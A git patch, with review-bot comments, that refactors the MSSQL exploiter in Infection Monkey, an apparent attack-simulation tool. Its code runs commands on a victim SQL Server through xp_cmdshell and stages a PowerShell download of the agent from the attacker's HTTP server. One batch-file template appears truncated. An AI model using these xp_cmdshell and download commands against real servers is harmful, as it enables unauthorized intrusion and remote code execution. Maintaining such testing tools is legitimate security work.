From 257c6b0b055a3beaeefcc1b7dc2d35301d81bf18 Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 14 Jun 2022 12:32:29 -0400
Subject: [PATCH] Agent: Refactor MSSQL agent download command

The first step in exploitation is to instruct the victim to download the agent. This commit refactors this code to remove the dependency on the MSSQLLimitedSizePayload. To do this, it introduces `_write_command_to_batch_file()` which will be reused by the agent execution command.
---
monkey/infection_monkey/exploit/mssqlexec.py | 38 ++++++++++----------
1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 8b378f418..f80dc3db6 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -37,7 +37,6 @@ class MSSQLExploiter(HostExploiter):
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@@ -133,9 +132,8 @@ class MSSQLExploiter(HostExploiter):
sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
+ self._write_download_command_to_batch_file(monkey_path_on_victim)
self.run_payload_file()
- self.add_executed_cmd(monkey_download_command.command)
def remove_temp_dir(self):
# Remove temporary dir we stored payload at
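Review bot: `upload_monkey` has no docstring and its name no longer describes what the new body does: it writes a PowerShell download command into the victim-side batch file and then runs that file, so the agent is pulled by the victim from `self.agent_http_path` rather than pushed by the exploiter. A one-line docstring would make that clear — `"""Stage the agent on the victim: write the download command into the batch file, then execute the file via xp_cmdshell."""`. Note also that the removed `add_executed_cmd(monkey_download_command.command)` call recorded the download command itself, whereas the new path (judging by `_run_mssql_command` in the next hunk) records the batch-file write command that wraps it, so the shape of the executed-command telemetry changes; if that is intended it deserves a sentence in the commit message.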
@@ -159,10 +157,24 @@ class MSSQLExploiter(HostExploiter):
http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT)
- def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
- self.run_mssql_command(monkey_download_command)
- return monkey_download_command
+ def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath):
+ agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
+ http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
+ )
+ self._write_command_to_batch_file(agent_download_command)
+
+ def _write_command_to_batch_file(self, command: str):
+ write_to_file_command = f"{self.payload_file_path}"
+ self._run_mssql_command(write_to_file_command)
+
+ # Note: This is a strangler used to replace self.run_mssql_command()
+ def _run_mssql_command(self, command: str):
+ logger.debug(f"Running command on SQL Server: {command}")
+
+ self.cursor.execute(f"xp_cmdshell '{command}'")
+ self.add_executed_cmd(command)
+
+ sleep(MSSQLExploiter.QUERY_BUFFER)
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
# Form monkey's launch command
@@ -177,18 +189,6 @@ class MSSQLExploiter(HostExploiter):
suffix=suffix,
)
- def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
- monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
- http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
- )
- prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
- suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
- payload_file_path=self.payload_file_path
- )
- return MSSQLLimitedSizePayload(
- command=monkey_download_command, suffix=suffix, prefix=prefix
- )
-
def brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute force connection attempts and if needed then init the payload process.
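Review bot: `_run_mssql_command` hard-codes the `xp_cmdshell '…'` wrapper in an f-string even though the class still defines `XP_CMDSHELL_COMMAND_START` and `XP_CMDSHELL_COMMAND_END` for exactly that purpose (first hunk), so the strangler and the legacy `run_mssql_command()` it is meant to replace can drift apart; prefer `self.cursor.execute(f"{MSSQLExploiter.XP_CMDSHELL_COMMAND_START}{command}{MSSQLExploiter.XP_CMDSHELL_COMMAND_END}")`. That wrapper splices `command` into a T-SQL string literal, so the helper silently requires every caller to have doubled any single quote beforehand — `MONKEY_DOWNLOAD_COMMAND` does this with `^''`, but `_write_command_to_batch_file` interpolates `self.payload_file_path` raw (its template looks truncated in this rendering, so confirm against the file), and a `'` in that path would end the literal early and change or break the command that reaches cmd.exe. Record that contract in a docstring rather than escaping here, since a blanket `replace("'", "''")` at this choke point would double the already-escaped `^''` in the download command: `"""Run *command* on the victim through xp_cmdshell. *command* is embedded in a T-SQL string literal, so any single quote in it must already be doubled ('')."""`. The `# Note: This is a strangler …` comment should also say what still has to migrate before `run_mssql_command()` can be deleted, ideally as a `TODO`.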